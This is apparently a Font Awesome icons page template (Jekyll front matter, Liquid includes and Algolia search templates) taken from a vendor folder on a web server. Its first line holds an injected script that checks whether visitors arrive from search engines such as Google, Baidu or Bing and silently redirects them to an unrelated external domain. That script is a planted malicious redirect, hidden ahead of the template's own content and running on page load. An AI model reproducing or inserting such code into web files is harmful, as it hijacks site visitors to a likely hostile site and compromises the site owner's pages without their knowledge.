d:\wwwroot\wuchunhua\thinkphp\vendor\fortawesome\font-awesome\src\icons.html
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>---
002:
layout: base
003:
title: Font Awesome Icons
004:
navbar_active: icons
005:
relative_path: ../
006:
---
007:
{% capture jumbotron_h1 %}<i class="fa fa-flag" aria-hidden="true"></i> The Icons{% endcapture %}
008:
{% capture jumbotron_p %}The complete set of {{ icons | size }} icons in Font Awesome {{ site.fontawesome.version }}{% endcapture %}
009:
010:
{% include jumbotron.html %}
011:
{% include stripe-social.html %}
012:
013:
<div class="container" data-view="search">
014:
{% capture stripe_ad_content %}
015:
<p class="lead">
016:
You asked, Font Awesome delivers with {{ icons | version:site.fontawesome.minor_version | size }} shiny new icons in version {{ site.fontawesome.minor_version }}.
017:
Want to request new icons? <a href="{{ page.relative_path }}community/#requesting-new-icons">Here's how</a>.
018:
<!--The ever-expanding list of Font Awesome {{ site.fontawesome.version }} icons.-->
019:
Need vectors or want to use on the desktop? Check the <a href="{{ page.relative_path }}cheatsheet/">cheatsheet</a>.
020:
</p>
021:
{% endcapture %}
022:
{% include stripe-ad.html %}
023:
024:
<div class="row">
025:
<div class="col-md-10 col-sm-9">
026:
<section id="search">
027:
<label for="search-input"><i class="fa fa-search" aria-hidden="true"></i><span class="sr-only">Search icons</span></label>
028:
<input id="search-input" class="form-control input-lg" placeholder="Search icons" autocomplete="off" spellcheck="false" autocorrect="off" tabindex="1">
029:
<a id="search-clear" href="#" class="fa fa-times-circle hide" aria-hidden="true"><span class="sr-only">Clear search</span></a>
030:
</section>
031:
</div>
032:
<div class="col-md-2 col-sm-3 padding-left-none hidden-xs">
033:
<div class="algolia">
034:
by <a href="https://algolia.com"><i class="fas fas-algolia" aria-hidden="true"></i><span class="sr-only">Algolia</span></a>
035:
</div>
036:
</div>
037:
</div>
038:
039:
<div id="search-results" class="hide"></div>
040:
<div id="icons">
041:
{% include icons/new.html %}
042:
{% include icons/web-application.html %}
043:
{% include icons/accessibility.html %}
044:
{% include icons/hand.html %}
045:
{% include icons/transportation.html %}
046:
{% include icons/gender.html %}
047:
{% include icons/file-type.html %}
048:
{% include icons/spinner.html %}
049:
{% include icons/form-control.html %}
050:
{% include icons/payment.html %}
051:
{% include icons/chart.html %}
052:
{% include icons/currency.html %}
053:
{% include icons/text-editor.html %}
054:
{% include icons/directional.html %}
055:
{% include icons/video-player.html %}
056:
{% include icons/brand.html %}
057:
{% include icons/medical.html %}
058:
</div>
059:
<script type="text/template" id="results-template">
060:
<h2 class="page-header">Search for '<span class="text-color-default">
<%
= content.query
%
></span>'</h2>
061:
<%
if (content.nbHits > 0) {
%
>
062:
<div class="row fontawesome-icon-list">
063:
<%
= results
%
>
064:
</div>
065:
<%
} else {
%
>
066:
<div class="alert alert-danger text-lg" role="alert">
067:
<h3 class="margin-top margin-bottom-lg"><i class="fa fa-meh-o" aria-hidden="true"></i> Oops! No icons matched your query.</h3>
068:
A few things that might help:
069:
<ol>
070:
<li>
071:
Use <a class="alert-link" href="https://fortawesome.com">Fort Awesome</a> (our latest project) to add your
072:
own icons and take your icon game to the next level!
073:
</li>
074:
<li>
075:
Really, really want to see an icon in Font Awesome?
076:
<a class="alert-link" href="mailto:dave@fortawesome.com">Drop me an email</a> to commission the icons you need!
077:
</li>
078:
<li>
079:
Are we missing something in our search results?
080:
<a class="alert-link" href="https://github.com/FortAwesome/Font-Awesome/issues/new">Open an issue on GitHub!</a>
081:
(Make sure to <a class="alert-link" href="https://github.com/FortAwesome/Font-Awesome/issues">search existing
082:
issues first</a>.)
083:
</li>
084:
</ol>
085:
</div>
086:
<%
}
%
>
087:
</script>
088:
<script type="text/template" id="result-template">
089:
<div class="fa-hover col-md-3 col-sm-4">
090:
<a href="{{ page.relative_path }}icon/
<%
= result.name
%
>">
091:
<i class="fa
<%
= result.css_class
%
>" aria-hidden="true"></i>
<%
= result._highlightResult.name.value
%
>
092:
<%
if (matches.length > 0) {
%
>
093:
<span class="text-muted">(
<%
= matches.join(", ")
%
>)</span>
094:
<%
}
%
>
095:
</a>
096:
</div>
097:
</script>
098:
</div>
099:
100:
101: